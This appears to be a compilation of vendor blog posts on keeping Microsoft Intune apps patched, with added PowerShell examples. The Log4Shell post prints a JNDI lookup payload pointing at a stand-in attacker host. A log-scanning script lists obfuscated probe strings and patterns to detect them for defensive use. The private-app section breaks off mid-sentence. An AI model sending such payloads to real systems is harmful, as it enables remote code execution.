How to keep your available Intune apps up to date


Available apps in the Company Portal are one of those features you really want to use but can't, because you lose control. Until now.

From a user's perspective, available apps in the Company Portal are great. Your computer isn't bloated with unnecessary apps, but you still have the freedom to install apps that have been approved by your IT department, without creating a ticket and waiting a week or two. It's also easy: open the Company Portal app, select the app you want, and a short while later you're good to go.

But there's a catch. Available apps are just that: available to be installed. When it's time to update such an app, the new version is also only made available; it does not replace the old version for users who already installed it. Add a few releases and you end up with an application landscape that is out of control and full of unpatched versions. There are complex workarounds out there that shuffle users between groups and mix assignment types, but none of them is really reliable.

So, how can you keep available installations in check?

1. Create a PowerShell script that detects whether the application is installed and outputs True or False. This can be as simple as testing whether a registry key exists: Test-Path 'HKLM:\SOFTWARE\Scappman'
2. Create your application as you would otherwise, but on the Requirements page click Add in the Scripts section and upload the requirement script. In our example the script outputs True if the key is found, so configure the output data type as Boolean with the operator Equals and the value Yes.
3. Make sure the detection rule identifies the new version specifically (for example a version comparison on the app's DisplayVersion value). A detection rule that only checks whether the app is present would report the old installation as installed, and the update would never run.

The next time a device checks in, the requirement script runs. If it returns True (the app is present) and the detection rule does not find the new version, the application is installed, which updates the existing installation. In the status overview the devices that have been updated are reported as Installed, while devices on which the application was not detected are reported as Not applicable.
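As an added example (not code from the original post), here are the two small scripts the mechanism above relies on, written as separate .ps1 files. They assume a hypothetical app whose installer creates HKLM:\SOFTWARE\Scappman with a DisplayVersion value, and an update package that is assigned as Required so the update runs without user action; the version number is a placeholder.

```powershell
# Added example, not from the original post. Save each part as its own .ps1 file.
# Assumptions: the (hypothetical) installer writes HKLM:\SOFTWARE\Scappman with a
# DisplayVersion value; the package carrying these scripts is assigned as Required.

# ---------- Requirement.ps1 (Requirements > Add > Script) ----------
# Configure: output data type Boolean, operator Equals, value Yes.
# Leave "Run script as 32-bit process on 64-bit clients" at No, otherwise a 64-bit app's
# HKLM:\SOFTWARE key is looked up under WOW6432Node and reported as missing.
# Intune compares the script's STDOUT with the configured value, so write the result to the pipeline.
$KeyPath = 'HKLM:\SOFTWARE\Scappman'
Write-Output (Test-Path -Path $KeyPath)    # "True" when any version is installed

# ---------- Detect.ps1 (Detection rules > Use a custom detection script) ----------
# Detected = exit code 0 AND something written to STDOUT; anything else = not detected.
# $Expected must be the version this package installs: a rule that only checks that the key
# exists would report the old version as installed and the update would never run.
$Expected = [version]'2.5.0'               # placeholder: set to the version inside the .intunewin
$KeyPath  = 'HKLM:\SOFTWARE\Scappman'
try {
    $installed = [version](Get-ItemProperty -Path $KeyPath -Name DisplayVersion -ErrorAction Stop).DisplayVersion
} catch {
    exit 1                                  # key or value missing: not installed
}
if ($installed -ge $Expected) {
    Write-Output "Detected version $installed"
    exit 0
}
exit 1                                      # older version present: install (update) now
```

With this pair, a device that has any version returns True for the requirement, fails detection while it is below the expected version, and so receives the update; a device without the app fails the requirement and is reported as Not applicable. Keep updating the Available app's own package too, so first-time installs from the Company Portal get the current version; the Required package with the requirement script only takes care of devices that already have the app.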
The easy way: don't want to spend time creating all those scripts, but still want the Available apps feature in Intune? Check out Scappman! Scappman not only lets you use Available apps for the predefined apps in its App Store, it also lets you upload your own app, provide the name it uses on the "Apps & Features" settings page, and keep your own custom apps in check. Find out here how we do it for you.

Everything you need to know about Log4Shell and how keeping apps up to date can save your data


If you still haven't heard of the Apache Log4j vulnerability, you are at big risk: this is a must-read.

On December 9, 2021, a critical vulnerability in a core feature of Log4j, CVE-2021-44228, also known as Log4Shell (and in some early reports as LogJam), was publicly disclosed. It had been reported to Apache by the Alibaba Cloud Security Team on November 24, 2021. Since the disclosure, the number of observed exploitation attempts has exceeded one million.

What is Log4j, and why does its vulnerability affect the security of your data?

Log4j is an open-source Apache logging library used in a huge number of Java applications to record what the application is doing, which includes strings supplied by users such as HTTP headers, usernames or search terms. Many Java-based applications and cloud services use it; services from Apple (iCloud), Amazon, Cisco, Cloudflare, Red Hat, Steam and Twitter were among those reported as affected and had to patch.

Log4Shell gives attackers remote code execution (RCE) on vulnerable applications without any authentication. In affected versions (Log4j 2.0-beta9 through 2.14.1) the library resolves lookups embedded in log messages: a logged string such as ${jndi:ldap://attacker.example/x} makes the application contact an attacker-controlled server over JNDI and load and run the code it returns. All the attacker has to do is get that string logged, for example by sending it in a User-Agent header. Once code runs inside the application, the data it can reach can be stolen, deleted, encrypted or held for ransom. On the CVSS scale Log4Shell is rated 10 out of 10.

Thousands of attacks on company data using CVE-2021-44228 have already been confirmed, which is not a surprise: Log4j is embedded in software from a vast number of vendors, and the exploit is trivial to execute. Experts expect even more attacks in the coming weeks.

Patching is the only option

So what can companies do to protect their data? Patch and keep applications up to date. The fix shipped in Log4j 2.15.0, and follow-up CVEs led to 2.16.0 and 2.17.0; Apache's recommendation is 2.17.1 or later for Java 8 (2.12.4 for Java 7, 2.3.2 for Java 6). Removing the JndiLookup class from the jar is the stopgap where an upgrade is not yet possible. Note that you usually do not patch Log4j yourself: it ships inside third-party applications, so the fix arrives as a vendor update of each affected product. Patching a single application isn't difficult, but each one must be tested to make sure the updated app still works. While patching applications is extremely time-consuming, it's a top priority for every organization that wants to keep its data secure.

How can Scappman help protect the data in your company?
If you still haven't heard of Scappman, now is the time. Scappman helps limit the damage from the Log4j vulnerability because we update third-party and private apps for you, so you can be sure the latest versions are installed on every computer. No need to spend days patching a single application! P.S. A non-exhaustive list of vulnerable software is maintained here: https://github.com/NCSC-NL/log4shell/tree/main/software
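While the vendor updates are rolling out, the question every team asked was "are we being probed?". As an added example (not part of the original post), the script below scans web-server log lines for Log4Shell lookup strings. Attackers hide the literal "jndi" with nested lookups such as ${lower:j}, ${env:NOPE:-j} or ${::-j}, so the scanner collapses those first and only then looks for ${jndi:<scheme>:. The sample lines are constructed, and 198.51.100.0/24 is a documentation address range.

```powershell
# Added example, not from the original post: find Log4Shell probes in log lines.
# All sample lines below are constructed; no real hosts are referenced.

function Expand-Log4jLookups {
    param([Parameter(Mandatory)][string]$Text)
    # Collapse innermost lookups (no $ { } inside them) until nothing changes:
    #   ${lower:X} / ${upper:X}  -> X, case-folded
    #   ${anything:-X}           -> X   (default-value syntax: ${env:NOPE:-j}, ${::-j}, ...)
    $inner = '\$\{(?:(lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}'
    $evaluator = [System.Text.RegularExpressions.MatchEvaluator]{
        param($m)
        switch ($m.Groups[1].Value) {
            'lower' { return $m.Groups[2].Value.ToLower() }
            'upper' { return $m.Groups[2].Value.ToUpper() }
            default { return $m.Groups[3].Value }
        }
    }
    do {
        $before = $Text
        $Text = [regex]::Replace($Text, $inner, $evaluator)
    } while ($Text -ne $before)
    return $Text.ToLower()
}

function Find-JndiLookups {
    # Emits one object per line that contains a ${jndi:<scheme>:...} lookup after de-obfuscation.
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($line in $Lines) {
        $m = [regex]::Match((Expand-Log4jLookups -Text $line), '\$\{jndi:([a-z]+):')
        if ($m.Success) {
            [pscustomobject]@{ Scheme = $m.Groups[1].Value; Line = $line }
        }
    }
}

# Constructed sample access-log lines: one benign request and four probe variants.
$sampleLines = @(
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /?x=${${lower:j}${lower:n}di:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NOTEXIST:-j}ndi:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://198.51.100.7/d}"'
)

# Run against a real file with: Find-JndiLookups -Lines (Get-Content 'C:\inetpub\logs\...\u_ex211210.log')
Find-JndiLookups -Lines $sampleLines | Format-Table -AutoSize
```

The scanner flags the last four sample lines (schemes ldap, ldap, rmi and dns) and leaves the benign request alone. A hit only proves that someone sent the payload; whether it worked depends on whether a vulnerable Log4j version logged that field, which is exactly what the software inventory of a vulnerability management tool has to answer.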

Trends for Microsoft Intune in 2022


Trend 1: Further integration of Apple products in Microsoft Intune

One item already on the roadmap for December 2021 was management of user-installed apps on iOS. Once an app is synced with Intune, Intune can take over management of an iOS app that was installed before enrollment. As a result, previously installed applications no longer need to be removed and redeployed on devices enrolled with Intune through device enrollment. These applications might have been distributed by another MDM previously, or installed by the user personally. This simplifies app management for both required and available applications when devices are moved to Intune.

The second integration is Defender for macOS policies in the Settings Catalog, also previewed in the January 2022 release.

The third item Microsoft is working on is enrolling BYOD or personally owned Apple devices. This has been possible for Android devices in Microsoft Intune since April 2021. If Microsoft sticks to the roadmap, 2022 will bring "Enroll devices into Intune through Apple account management."

The last item in this trend is DMG app management for macOS: extending app deployment and management to DMG packages, the macOS counterpart of a Windows .exe installer.

If Microsoft continues this way, there should be no reason for companies not to accept Apple devices in their Microsoft Intune environment.

Trend 2: Microsoft Intune and Microsoft Endpoint Manager also integrate Linux

Ubuntu is one of the most widely deployed Linux distributions; there is even an article asking "Can the Internet exist without Linux?" For the enterprise this means being able to enroll, manage and secure Ubuntu desktops and laptops and use Conditional Access for compliance.
Microsoft will start with Ubuntu, with support for Red Hat, CentOS and Fedora on the way. As part of that move, IT administrators can create Azure Active Directory Conditional Access policies for Linux machines, just as they do for Windows, mobile and Mac devices, so that only compliant Linux devices gain access to corporate resources such as Microsoft 365 applications. The Microsoft Endpoint Manager team also noted that, besides the management and security capabilities themselves, the added reporting helps with verifying encryption status, spotting problems caused by BitLocker or Windows Defender Firewall settings, and regularly comparing the Defender for Endpoint security score so that weaknesses are detected and fixed.

Trend 3: Moving from SCCM to Microsoft Intune, or doing co-management

We even wrote an article, "From SCCM to Microsoft Intune." Many companies running SCCM (System Center Configuration Manager, formerly SMS, Systems Management Server) are moving towards Microsoft Intune. The most significant difference between the traditional approach and Intune is that SCCM is image-based management while Intune is profile-based management. Brad Anderson, CVP at Microsoft, predicted that Intune's market penetration would reach 50% by January 1, 2022. A lot has changed in the last two years, especially in security and the modern workplace, and Covid-19 kick-started the adoption of Microsoft Intune: during the pandemic we saw an increase in bring-your-own-device and working from home, with all the security problems that come with it. These reasons meant Intune rapidly gained market share.
In August of last year, Gartner named Microsoft a Leader in its Magic Quadrant for Unified Endpoint Management Tools. We don't know the exact number of companies using Microsoft Intune, but some internal sources say usage has increased by 240%, so the 50% adoption prediction was probably not an overstatement.

The problem is that Microsoft Intune can't do everything SCCM can do, and SCCM, even combined with Intune, can't do everything Intune can do. So some companies switching from SCCM are doing co-management, which we will explain in a different blog post. What you need to remember is the following. Sidenote by Microsoft: when you manage devices with both Configuration Manager and Microsoft Intune, this configuration is called co-management. When you manage devices with Configuration Manager and enroll them in a third-party MDM service, this configuration is called coexistence. Unless you have co-management, with both Configuration Manager and Intune in place, you can't balance the workloads between the two, which results in conflicts. This interaction is not available with third-party integrations, so the management capabilities under coexistence are restricted.

How Scappman manages Multi-tenancy


Managed service providers (MSPs) are always looking to automate recurring tasks. Changing a setting for one customer and then repeating that action for 1,000 other customers is very time-consuming. The same goes for application patch management: MSPs want to make sure all of their customers are secured with the latest software patches. If your customers use Microsoft Endpoint Manager and you want their applications up to date, you need to monitor for new versions, package each version and wrap it in an .intunewin file. Then you need to upload the packages to every customer tenant. Already done that? Then you probably know that you can start all over again, because by the time you're finished a new update is available. At Scappman we've implemented an easy way to switch between your customers, so you see what your customers can see (if you allowed them access to the portal). No need to sign out and sign in to multiple tenants. We define a reseller-customer relationship so you get a good overview of your customers' patch status.

The best mobile device management solution in 2022: SCCM vs. Intune


Choosing mobile device management (MDM) and mobile application management (MAM) solutions for your company can be challenging. With "bring your own device" (BYOD) on the rise, MDM plays a crucial role in controlling corporate data on devices through access policies and data security settings. Here the eternal dilemma arises: should you go with Microsoft System Center Configuration Manager (SCCM, also called ConfigMgr) or Microsoft Intune? Both are part of Microsoft Endpoint Manager, a single, integrated platform for managing all the endpoints in an organization. Intune is a cloud-based service for managing company-owned and personal devices, while SCCM is a traditional on-premises solution. Let's look at both, evaluating their pros and cons.

What is SCCM / ConfigMgr?

According to Microsoft, SCCM is "an on-premises solution to manage desktops, servers, and laptops that are on your network or internet-based." Originally released in 1994 as SMS and now part of Microsoft Endpoint Manager (MEM), it focuses on managing Windows devices across the enterprise (typically 300+ devices).

SCCM's functionality includes:
SCCM pros:
SCCM cons:

What is Microsoft Intune?

Microsoft describes Intune as a "cloud-based service that focuses on mobile device management (MDM) and mobile application management (MAM)." Being cloud-based, Intune has a simpler architecture than SCCM because it needs no on-premises infrastructure. One of Intune's main aims is a secure work environment: it controls device usage and lets you design access policies for devices, including BYOD. Intune can separate corporate data from employees' personal data on BYOD devices, so employees no longer need a second device, and it makes it easy to check that all devices comply with enterprise requirements.

Intune's additional features are:
Intune pros:
Intune cons:

SCCM vs. Intune – Overview

Feature | SCCM | Microsoft Intune
Positioning | On-premises | Cloud
Costs | Subscription | Subscription (price depends on the data used)
Software updates | Supports updates, patches and software distribution | Supports updates, patches and software distribution
Servers | Servers required | No physical server needed; requires internet access
Remote features | VPN, Wi-Fi | Remote deployment

Summary

Microsoft Intune and System Center Configuration Manager offer different features, and it's up to you to decide which best suits your business. Intune is a cloud-based solution accessible from anywhere, which makes it a good fit for remote workers. With the ongoing COVID-19 pandemic, employees work outside protected corporate networks and use their own devices, and Intune keeps corporate data safeguarded there. Intune also supports limited monitoring and management of non-Windows systems. SCCM is a powerful tool that can manage a variety of endpoints and has rich functionality; however, it can be complicated to work with and expensive.

What are applications update rings?


For a company, applications can be challenging to manage. They need to be installed on computers and maintained afterwards: whenever a new version is released, IT has to roll it out to all computers again. Note: all applications need to be kept up to date so that attackers cannot abuse known vulnerabilities in the software.

In our experience an application needs updating about once a week on average, and each update takes around four hours to package and test. Multiply this by the number of applications in your company and you know how much precious IT time goes into this process.

The bigger the company, the more control you need. Pushing a conflicting update to more than 1,000 users can be a disaster for your business, so it's essential to roll out updates in waves. In IT terminology this is called "update rings": IT first installs the update for a limited group of users (the pilot group); once no issues or conflicts have been reported, the update is advanced to a larger group, and so on. The bigger the company, the more rings. IT has to manage and monitor this for every update of every application, which is not the most thrilling task for a professional IT team and one of the reasons companies don't always run the latest versions.

How to manage application update rings in Intune

There are two ways to manage application update rings in Intune:
1. Changing the sources of an application.
2. Changing the assignments of an application.

Changing the sources of an application

In this scenario you create one Intune application per update ring. The sources and settings are the same for all of them, but the assignments differ. As an example, take three update rings:
Application_Group_Fast
Application_Group_Slow
Application_Group_Release

At creation all three applications contain the same version but have different group assignments. When a new version of the application is released, IT replaces the .intunewin file (the new sources, commands and configuration settings) of the Fast application and updates its detection rule to the new version; members of Group_Fast receive the update and validate it. After the testing period, IT replaces the .intunewin file of the application for the next group, and so on. A lot of manual work is involved if you don't have an automation tool for it.

Changing the assignments of an application

The other way to use update rings is to change the assignments. Here IT creates a new Intune application for each version. The first version has all three groups assigned. When a new version appears, IT creates a second Intune application and assigns Group_Fast to it (removing Group_Fast from the old one). After testing and validation, IT assigns the next group to the new application, and repeats this until all groups are on the new version. Afterwards the initial version can be removed from Intune.
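The second approach is easy to automate, because each promotion is just a rewrite of two apps' assignment sets. As an added example (not code from the original post), the script below promotes a new version one ring at a time through Microsoft Graph using Invoke-MgGraphRequest from the Microsoft.Graph module. It assumes the three groups exist, that the group and app IDs shown are placeholders, and that you have already run Connect-MgGraph -Scopes 'DeviceManagementApps.ReadWrite.All'; with -DryRun it only prints the requests it would send.

```powershell
# Added example, not from the original post. Placeholders: group IDs, app IDs 'app-v1'/'app-v2'.
# Prerequisite: Connect-MgGraph -Scopes 'DeviceManagementApps.ReadWrite.All' (Microsoft.Graph module).

$Rings = [ordered]@{                                 # ring order = rollout order
    'Application_Group_Fast'    = '00000000-0000-0000-0000-000000000001'   # placeholder group IDs
    'Application_Group_Slow'    = '00000000-0000-0000-0000-000000000002'
    'Application_Group_Release' = '00000000-0000-0000-0000-000000000003'
}

# $State maps ring name -> Intune app ID the ring is currently assigned to.
function Step-Ring {
    param([Parameter(Mandatory)][System.Collections.IDictionary]$State,
          [Parameter(Mandatory)][string]$NewAppId)
    $next = $Rings.Keys | Where-Object { $State[$_] -ne $NewAppId } | Select-Object -First 1
    if (-not $next) { throw "App $NewAppId is already assigned to every ring" }
    $plan = [ordered]@{}                             # copy, so the caller keeps the previous plan
    foreach ($r in $Rings.Keys) { $plan[$r] = $State[$r] }
    $plan[$next] = $NewAppId
    return $plan
}

function New-AssignmentBody {
    # The assign action replaces the app's whole assignment set, so send every ring that
    # should point at this app, not only the one that changed. An empty list clears the app.
    param([Parameter(Mandatory)][System.Collections.IDictionary]$State,
          [Parameter(Mandatory)][string]$AppId)
    $assignments = @(foreach ($r in $Rings.Keys) {
        if ($State[$r] -eq $AppId) {
            @{
                '@odata.type' = '#microsoft.graph.mobileAppAssignment'
                intent        = 'required'
                target        = @{ '@odata.type' = '#microsoft.graph.groupAssignmentTarget'; groupId = $Rings[$r] }
            }
        }
    })
    return @{ mobileAppAssignments = $assignments }
}

function Invoke-RingPromotion {
    param([System.Collections.IDictionary]$State, [string]$OldAppId, [string]$NewAppId, [switch]$DryRun)
    $plan = Step-Ring -State $State -NewAppId $NewAppId
    foreach ($app in @($NewAppId, $OldAppId)) {      # the new app gains a ring, the old app loses it
        $body = New-AssignmentBody -State $plan -AppId $app
        $uri  = "https://graph.microsoft.com/v1.0/deviceAppManagement/mobileApps/$app/assign"
        if ($DryRun) { Write-Host "POST $uri`n$($body | ConvertTo-Json -Depth 5)" }
        else         { Invoke-MgGraphRequest -Method POST -Uri $uri -Body $body | Out-Null }
    }
    return $plan
}

# Dry run: every ring starts on app-v1; each call moves app-v2 one ring further (Fast, Slow, Release).
$state = [ordered]@{}
foreach ($r in $Rings.Keys) { $state[$r] = 'app-v1' }
$state = Invoke-RingPromotion -State $state -OldAppId 'app-v1' -NewAppId 'app-v2' -DryRun
$state = Invoke-RingPromotion -State $state -OldAppId 'app-v1' -NewAppId 'app-v2' -DryRun
```

Run the promotion once per testing period. After the third call the old app's assignment list is empty, which is the moment to delete it from Intune; a fourth call throws instead of re-posting, so a scheduled job cannot silently push past the last ring.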

What is a day zero-bug or a zero-day attack?


A zero-day bug or zero-day attack, as defined by Hewlett Packard, "occurs when a vulnerability is being exploited before the vulnerable software vendor has knowledge of the vulnerability and develops a patch." Zero-day attacks are dangerous because attackers exploit the vulnerability before any patch exists. The meaning is straightforward: it's like asking a customer when they want a project finished and hearing "yesterday." Yesterday everything was alright; today it is not, and the vendor has had zero days to fix the bug.

The difference between a zero-day vulnerability, a zero-day exploit, a zero-day attack and a zero-day virus

A zero-day vulnerability is a flaw in released software that attackers know about before the vendor has a patch for it. Because no patch exists during this window of exposure, any attack against it can proceed. A zero-day is thus the opposite of a known vulnerability, for which a patch has been published. A zero-day exploit is the code or technique attackers use to gain access through such a flaw. A zero-day attack is an attack that uses a zero-day exploit against a system with a zero-day vulnerability. A zero-day virus is malware that is new enough that security products do not yet recognise it.

It's all in the patches

Patching and updating are crucial to removing vulnerabilities. The increase in cyberattacks during the pandemic has been phenomenal; some reports cite a rise of 600%, with a noticeable increase in attacks targeting mobile devices. If you work in this industry, you probably already know this. With working from home and BYOD policies it's becoming an even bigger issue, for a straightforward reason: it's an open door for attackers.
Even with company policies and VPNs in place, it's still tricky for IT managers to keep attackers out of their systems. That's why Microsoft Endpoint Manager and Microsoft Intune are essential software for every enterprise working in a Microsoft ecosystem, and if you want to go further, include Scappman as an add-on. Scappman is a 100% cloud solution that automatically installs your applications and keeps them up to date, saving your IT team hours. So now you know the difference between vulnerabilities, exploits and attacks. Remember: it's better to be safe than sorry.

How to manage private applications in Microsoft Intune?


We get this question a lot. First, people may have different understandings of what private apps and public apps are.

Private applications are applications whose sources can't be downloaded from the internet without providing personal information, or that require a license key or license file. Private applications are not monitored for new versions. Note: it's the customer's or partner's responsibility to provide Scappman with the resources for the initial packaging and for every update afterwards, together with a procedure for installing the application. Scappman can package these applications, but this is billable; prices are listed on the platform.

Public applications are applications for which Scappman has access to the sources on the vendor's website. Public applications are monitored for new versions and updated by Scappman on the platform. Note: public applications that do not support silent installs can only be requested as private applications. Scappman packages these applications free of charge for subscribed customers.

Private application management in Microsoft Intune

Prepare the application installation file for upload

Before you add a private app to Microsoft Intune, you must prepare it with the Microsoft Win32 Content Prep Tool. The tool wraps the application installation files into the .intunewin format and records metadata about the setup file (for an MSI, its product code and version) that Intune uses to prefill the install command and detection rule. After that, the application is ready to be uploaded to Intune. Let's use the app <yourprivateapp> as an example.

1. Download the Microsoft Win32 Content Prep Tool from GitHub. The .zip file contains IntuneWinAppUtil.exe, the Microsoft license terms, a readme and release notes. Use the latest version of the tool; otherwise you'll see a warning that the app was packaged with an older version.
2. Create a folder that contains the private application's installation files.
3. Create an installation file yourprivateapp.cmd that contains the installation command and put it in the directory with the other installation files.
4. Open a Command Prompt and go to the location of IntuneWinAppUtil.exe: cd <name of the folder>
5. Run IntuneWinAppUtil.exe and provide the requested information: source folder, setup file, output folder.
6. Once the installation file is converted, you'll see the message Done!!! The private application is now ready to be uploaded to Microsoft Intune.

Add a private app to Intune

1. Sign in to the Microsoft Endpoint Manager admin center.
2. In the left pane go to Apps -> All apps -> Add.
3. In the Select app type menu choose Windows app (Win32).
4. In the Add App menu select the app package we created, yourprivateapp.intunewin, and click OK.
5. In the App information tab add the details for your private application: name, description, publisher, category, whether to show it as a featured app in the Company Portal, information URL, privacy URL, developer, owner, notes and logo.
6. In the Program tab configure the installation process: the commands, the install behavior and the device restart behavior.
Install command: normally filled in automatically. If it isn't, use yourprivateapp.cmd.
Uninstall command: msiexec /x "{12345A67-89B0-1234-5678-000001000000}" (the product code of the MSI).
Device restart behavior, one of four options:
Determine behavior based on return codes.
No specific action: suppresses device restarts during the installation of MSI-based apps; choose this if you don't want the device to reboot after the installation.
App install may force a device restart.
Intune will force a mandatory device restart.
Return codes: specify the return codes that determine either the installation retry behavior or the post-installation behavior.
Return code entries are added by default when you create the app, but you can add more or change the existing ones. Code types:
Success: the application installed successfully.
Retry: Intune retries the installation three times, waiting five minutes between attempts.
Soft reboot: the application installed, but a reboot is needed to complete the installation; the next app can be installed without rebooting first.
Hard reboot: the device must reboot before the installation is complete and before the next app can be installed.
Failed: the installation failed.

7. In the Requirements tab specify the requirements a device must meet before the application is installed: operating system architecture (32-bit / 64-bit), minimum operating system, disk space required (optional), physical memory required (optional), minimum number of logical processors required (optional) and minimum CPU speed required (optional).

8. You must also specify the detection rules: how Intune determines that the private application is installed. This can be done manually (MSI, file or registry rules) or with a custom PowerShell script.

Manual detection rule formats:
MSI: detects a specific MSI product code, optionally with a specific version. This rule type can only be used once per app.
File: detects a specific file or folder by existence, date, version or size.
Properties:
Path: the full path of the folder that contains the file or folder to detect.
File or folder: the file or folder used to detect the app.
Detection method: the check to perform (File or folder exists, Date modified, Date created, String (version), Size in MB).
Registry: detects the installation based on a registry value (string, integer or version).
Properties:
Key path: the full path of the registry key containing the value used to detect the installation, e.g. HKEY_LOCAL_MACHINE\Software\YourPrivateApp.
Value name: if this property is empty, detection is done on the key's default value. The default value will also
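Steps 2 to 6 of the packaging procedure, plus the product-code lookup for the uninstall command, can be done from one PowerShell script instead of the interactive prompts. This is an added example and not code from the original post; the paths, the app name, the LICENSEKEY property and the assumption that the product is already installed on the packaging machine (so its Uninstall key exists) are all placeholders.

```powershell
# Added example, not from the original post. All paths and names are placeholders.
# Assumptions: IntuneWinAppUtil.exe lives in $ToolDir, the installer files are in $Source, and the
# product is installed on this machine so its Uninstall registry key can be read.

$ToolDir = 'C:\IntuneWinAppUtil'
$Source  = 'C:\Packages\YourPrivateApp\Source'
$Output  = 'C:\Packages\YourPrivateApp\Output'

# 1. The wrapper the Install command calls. %~dp0 is the folder Intune extracts the package to;
#    /qn = silent, /norestart leaves the reboot decision to Intune, and exit /b passes msiexec's
#    return code (0, 3010 soft reboot, 1641 hard reboot, 1618 retry) through to Intune's return-code table.
$wrapper = @'
@echo off
msiexec /i "%~dp0YourPrivateApp.msi" /qn /norestart LICENSEKEY=XXXX-XXXX /l*v "%ProgramData%\YourPrivateApp-install.log"
exit /b %errorlevel%
'@
Set-Content -Path (Join-Path $Source 'yourprivateapp.cmd') -Value $wrapper -Encoding ASCII

# 2. Wrap the folder. -q answers the prompts and overwrites an existing .intunewin.
& (Join-Path $ToolDir 'IntuneWinAppUtil.exe') -c $Source -s 'yourprivateapp.cmd' -o $Output -q
if ($LASTEXITCODE -ne 0) { throw "IntuneWinAppUtil failed with exit code $LASTEXITCODE" }

# 3. Read the ProductCode from the Uninstall keys (64-bit and 32-bit views) so the Uninstall
#    command uses the real GUID instead of a guessed one.
function Get-MsiProductCode {
    param([Parameter(Mandatory)][string]$DisplayName)   # wildcards allowed, e.g. 'YourPrivateApp*'
    $roots = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
             'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall'
    Get-ChildItem -Path $roots -ErrorAction SilentlyContinue |
        ForEach-Object { Get-ItemProperty -Path $_.PSPath } |
        Where-Object { $_.DisplayName -like $DisplayName -and $_.PSChildName -match '^\{[0-9A-F-]{36}\}$' } |
        Select-Object DisplayName, DisplayVersion, @{ n = 'ProductCode'; e = { $_.PSChildName } }
}

$app = Get-MsiProductCode -DisplayName 'YourPrivateApp*'
"Uninstall command: msiexec /x `"$($app.ProductCode)`" /qn /norestart"
"Detection: MSI product code $($app.ProductCode), version $($app.DisplayVersion)"
```

The same DisplayVersion value is what an MSI or registry detection rule should compare against, so packaging, the uninstall command and the detection rule all come from one source of truth. If the script prints more than one product code, narrow the DisplayName pattern before copying anything into Intune.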

Detecting vulnerable applications with Microsoft Threat and Vulnerability Management


Given the number of cyberattacks companies face these days, fixing vulnerabilities has become one of the biggest challenges. According to the US-CERT vulnerability database, 18,376 new security vulnerabilities were recorded in 2021, surpassing the 2020 record of 18,351, and more than half of them (57%) could have been prevented by identifying and fixing them in time. Another indication of the problem: only 16% of executives say they are prepared to deal with cyber threats. Identifying, assessing and remediating new endpoint vulnerabilities is therefore crucial to a successful security strategy.

Microsoft Threat and Vulnerability Management (TVM) helps organizations with exactly this. It discovers the vulnerabilities and configuration errors that exist on onboarded endpoints in near real time using the Defender for Endpoint sensor, and gives recommendations you can follow to secure those endpoints. In this blog we cover TVM's functionality and how it helps you increase the security of your IT estate by identifying vulnerable applications and software.

What is Microsoft TVM?

Microsoft TVM is one of the security pillars of Microsoft Defender for Endpoint. It identifies vulnerabilities and misconfigurations in near real time and prioritizes them based on the threat landscape. It is cloud-powered and integrated with the Microsoft endpoint security stack, the Microsoft Intelligent Security Graph and the application analytics knowledge base. TVM helps bridge the gap between security operations, security administration and IT administration.

1. Real-time discovery. Vulnerability discovery is the first step in TVM. Microsoft Defender for Endpoint continuously collects information about each endpoint (OS, installed applications and device behavior) through the built-in sensor in Windows 10/11 and sends it to the cloud.
Real-time discovery provides:
Real-time device inventory: devices onboarded to Defender for Endpoint automatically report vulnerability and security configuration data to the dashboard.
Visibility into software and vulnerabilities: insight into the organization's software inventory and software changes such as installations, uninstalls and patches. Newly discovered vulnerabilities are reported with actionable mitigation recommendations for first- and third-party applications.
Application runtime context: visibility into application usage patterns for better prioritization and decision-making.
Configuration posture: visibility into the organization's security configuration and misconfigurations. Issues are reported on the dashboard with actionable security recommendations.

2. Intelligence-driven prioritization. TVM provides insights that help you prioritize security tasks and focus on the most urgent ones. Security recommendations are ranked using dynamic threat and business context:
Emerging attacks in the wild: Microsoft threat intelligence tracks emerging threats around the world and raises the priority of recommendations that address currently exploited, highest-risk vulnerabilities.
Pinpointing active breaches: Microsoft Defender for Endpoint knows which attacks are currently happening in your organization, and TVM uses this to prioritize recommendations.
Protecting high-value assets: deep integration with Microsoft Information Protection identifies devices holding confidential data or running business-critical applications.

3. Seamless remediation. Remediation involves both security and IT administrators: security admins track and manage vulnerabilities, while IT admins are responsible for patching.
TVM components

Threat & Vulnerability Management dashboard: gives a high-level view of the organization's security, including the exposure score, Microsoft Secure Score for Devices and the device exposure distribution. To open it, go to security.microsoft.com and, in the left pane, Endpoints -> Vulnerability management -> Dashboard.

Exposure score reflects the overall exposure of the endpoints across the organization; the lower the score, the better. It is broken down into levels: 0–29 low, 30–69 medium, 70–100 high. Many factors affect the score, such as the number of weaknesses discovered on your devices, the likelihood of a device being breached and the value of the device to the organization. The exposure score pane shows the trend of the score, which changes continuously as new CVEs are published and remediation actions are taken.

Microsoft Secure Score for Devices reflects the collective security configuration state of the endpoints across five categories: application, operating system, network, accounts and security controls. The higher the score, the better protected your endpoints are. It is calculated from a configuration discovery assessment of all endpoints in the organization, compared against benchmarks maintained by Microsoft (recommended configurations from application vendors and Microsoft's internal research team). The dashboard also shows the trend of this score over time.

Device exposure distribution shows how many devices fall into each exposure level. Selecting a section of the doughnut chart lists the affected devices with their exposure and risk level, domain, OS platform, Windows version, health state, last update time and tags.
Recommendations

Threats and vulnerabilities identified in your organization are mapped to security recommendations and prioritized by their impact. By following the prioritized recommendations you reduce your exposure score and raise your Secure Score for Devices. Every device is scored on three factors, to help you focus on the right things at the right time:
- Threat: the characteristics of the attacks that exploit the particular vulnerability.
- Breach likelihood: your organization's security posture and resilience against the vulnerability.
- Business value: the impact on the organization's assets and processes.
To access the security recommendations, go to Vulnerability management -> Recommendations.

Security recommendation details

